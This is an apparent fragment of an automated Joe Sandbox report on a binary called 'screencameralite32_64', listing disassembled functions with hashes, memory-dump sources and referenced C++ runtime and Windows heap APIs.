                                                              • Opcode ID: 7cfee813da1e85e928c0918eaf61049dd2d5953884e175ace6b3a96641e25f2d
                                                              • Instruction ID: 5e22593df8f27357430a2d700417a1728129dd7eea30f4b86667f7fe55c14633
                                                              • Opcode Fuzzy Hash: 7cfee813da1e85e928c0918eaf61049dd2d5953884e175ace6b3a96641e25f2d
                                                              • Instruction Fuzzy Hash: 48F0E2B060030A66DF04FAA88D58DAF73ACAF44318B804569A921E3680EB70FA0485D4
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 02C73C1B
                                                              • std::bad_exception::bad_exception.LIBCMT ref: 02C73C30
                                                                • Part of subcall function 02C823F7: std::exception::exception.LIBCMT ref: 02C82401
                                                                • Part of subcall function 02C7A58A: __EH_prolog.LIBCMT ref: 02C7A58F
                                                                • Part of subcall function 02C7A58A: __CxxThrowException@8.LIBCMT ref: 02C7A5B8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2965569706.0000000002C71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_2c71000_screencameralite32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: H_prolog$Exception@8Throwstd::bad_exception::bad_exceptionstd::exception::exception
                                                              • String ID: bad cast
                                                              • API String ID: 1300498068-3145022300
                                                              • Opcode ID: 32cd310c070c7b1a7147081679b6140d5786371ebb33cfee9f1d178acc50d9cf
                                                              • Instruction ID: ba575da319b90bad87d89e52b034b8c6c1cc02b99cf514f997bbe4dab6f47d79
                                                              • Opcode Fuzzy Hash: 32cd310c070c7b1a7147081679b6140d5786371ebb33cfee9f1d178acc50d9cf
                                                              • Instruction Fuzzy Hash: 97F0E5729009049BCB09EF58D454AEEB779FF51311F5041AEEE0A5B280CB72DA46DEE1
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 02C738D2
                                                              • std::runtime_error::runtime_error.LIBCPMT ref: 02C738F1
                                                                • Part of subcall function 02C71410: std::exception::exception.LIBCMT ref: 02C71428
                                                                • Part of subcall function 02C788BF: _memmove.LIBCMT ref: 02C788DF
                                                              Strings
                                                              • Year is out of valid range: 1400..10000, xrefs: 02C738E0
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2965569706.0000000002C71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_2c71000_screencameralite32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: H_prolog_memmovestd::exception::exceptionstd::runtime_error::runtime_error
                                                              • String ID: Year is out of valid range: 1400..10000
                                                              • API String ID: 3258419250-2344417016
                                                              • Opcode ID: b06a803182ac94fd064e102d49efe4b2d0d08911beb07256b83c734979679484
                                                              • Instruction ID: 3bc8ff4bab430303dade4e43fcdd713d6807034d46935f019c17377e3e6db519
                                                              • Opcode Fuzzy Hash: b06a803182ac94fd064e102d49efe4b2d0d08911beb07256b83c734979679484
                                                              • Instruction Fuzzy Hash: 0AE0D8B2E4010497EF14FF988C197DDBB79EF08B50F40055AD40577680DAB11944DBD5
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 02C73886
                                                              • std::runtime_error::runtime_error.LIBCPMT ref: 02C738A5
                                                                • Part of subcall function 02C71410: std::exception::exception.LIBCMT ref: 02C71428
                                                                • Part of subcall function 02C788BF: _memmove.LIBCMT ref: 02C788DF
                                                              Strings
                                                              • Day of month value is out of range 1..31, xrefs: 02C73894
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2965569706.0000000002C71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_2c71000_screencameralite32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: H_prolog_memmovestd::exception::exceptionstd::runtime_error::runtime_error
                                                              • String ID: Day of month value is out of range 1..31
                                                              • API String ID: 3258419250-1361117730
                                                              • Opcode ID: d3d2f964d26ec39afa388b908afde88714b5a6b14f9175d646a6b4d245aa59aa
                                                              • Instruction ID: 8fcc7fcc7d795e6ce3e37962f854509b1a36acbdbf669198970fc97dc5c3a9b8
                                                              • Opcode Fuzzy Hash: d3d2f964d26ec39afa388b908afde88714b5a6b14f9175d646a6b4d245aa59aa
                                                              • Instruction Fuzzy Hash: 01E0D872E0010497EB14BF948C19BDDBB79EF08B50F40015AD40573680DAB11944DBD5
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 02C7391E
                                                              • std::runtime_error::runtime_error.LIBCPMT ref: 02C7393D
                                                                • Part of subcall function 02C71410: std::exception::exception.LIBCMT ref: 02C71428
                                                                • Part of subcall function 02C788BF: _memmove.LIBCMT ref: 02C788DF
                                                              Strings
                                                              • Month number is out of range 1..12, xrefs: 02C7392C
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2965569706.0000000002C71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_2c71000_screencameralite32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: H_prolog_memmovestd::exception::exceptionstd::runtime_error::runtime_error
                                                              • String ID: Month number is out of range 1..12
                                                              • API String ID: 3258419250-4198407886
                                                              • Opcode ID: 83d4f6b8ac24548b0d8e795664fc217a1a807060937bf3d3d77f3e42a0eb4096
                                                              • Instruction ID: 3168eaff40a56d6512740fbaa7b6d8ad929db58811b851ea1505942cb6b1957d
                                                              • Opcode Fuzzy Hash: 83d4f6b8ac24548b0d8e795664fc217a1a807060937bf3d3d77f3e42a0eb4096
                                                              • Instruction Fuzzy Hash: E6E0D872E0010897EF14BF948C197DDBB79EF08750F50015AD80573680DAF11944DBD1
                                                              APIs
                                                              • TlsAlloc.KERNEL32 ref: 02C719CC
                                                              • GetLastError.KERNEL32 ref: 02C719D9
                                                                • Part of subcall function 02C71712: __EH_prolog.LIBCMT ref: 02C71717
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2965569706.0000000002C71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_2c71000_screencameralite32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocErrorH_prologLast
                                                              • String ID: tss
                                                              • API String ID: 249634027-1638339373
                                                              • Opcode ID: 20c00152dfb4bd85cb1388ddb5e6b7a549b5bf9fef9f30389d559f7b661e9065
                                                              • Instruction ID: f5341e969180b92ab9329292e18aefef19e62df258398df6b7e24e6df2f9e911
                                                              • Opcode Fuzzy Hash: 20c00152dfb4bd85cb1388ddb5e6b7a549b5bf9fef9f30389d559f7b661e9065
                                                              • Instruction Fuzzy Hash: B7E0CD71D152109BC7007B78DC0C18FFBA49A44274F148B66FCBD832D0EB3049149BC6
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 02C73BD8
                                                              • std::bad_exception::bad_exception.LIBCMT ref: 02C73BED
                                                                • Part of subcall function 02C823F7: std::exception::exception.LIBCMT ref: 02C82401
                                                                • Part of subcall function 02C7A58A: __EH_prolog.LIBCMT ref: 02C7A58F
                                                                • Part of subcall function 02C7A58A: __CxxThrowException@8.LIBCMT ref: 02C7A5B8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2965569706.0000000002C71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_2c71000_screencameralite32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: H_prolog$Exception@8Throwstd::bad_exception::bad_exceptionstd::exception::exception
                                                              • String ID: bad cast
                                                              • API String ID: 1300498068-3145022300
                                                              • Opcode ID: 434bc1aa1fb1a0783bc318239b56bbbcbed0de402ede51168a7200a510ca59a4
                                                              • Instruction ID: 786cfccf66886fe98d4aff2d6f53ddf076b3fbf7a6cd920b0a495d301c42421c
                                                              • Opcode Fuzzy Hash: 434bc1aa1fb1a0783bc318239b56bbbcbed0de402ede51168a7200a510ca59a4
                                                              • Instruction Fuzzy Hash: 27E0DF70900109EBCB09EF94D519BBCB775EF10300F4080ACDD0A172C0CB319A06DE92
                                                              APIs
                                                              • HeapReAlloc.KERNEL32(00000000,00000050,?,00000000,00404838,?,?,?,00000100,?,00000000), ref: 00404A98
                                                              • HeapAlloc.KERNEL32(00000008,000041C4,?,00000000,00404838,?,?,?,00000100,?,00000000), ref: 00404ACC
                                                              • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004,?,00000000,00404838,?,?,?,00000100,?,00000000), ref: 00404AE6
                                                              • HeapFree.KERNEL32(00000000,?,?,00000000,00404838,?,?,?,00000100,?,00000000), ref: 00404AFD
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2964215788.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000002.00000002.2964215788.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_400000_screencameralite32_64.jbxd
                                                              Similarity
                                                              • API ID: AllocHeap$FreeVirtual
                                                              • String ID:
                                                              • API String ID: 3499195154-0
                                                              • Opcode ID: 326bc21520183113991a8339bf2de7ac4146e2f373772080d0e11da3f1adebb6
                                                              • Instruction ID: e2b6aa67baf941fda6b0a0502f281f3949fe5c10b928d307e266fea8edbc1969
                                                              • Opcode Fuzzy Hash: 326bc21520183113991a8339bf2de7ac4146e2f373772080d0e11da3f1adebb6
                                                              • Instruction Fuzzy Hash: 1E1113B0201601EFC7208F19EE85E227BB5FB857217114A3AF692E65F1D770A845CB4C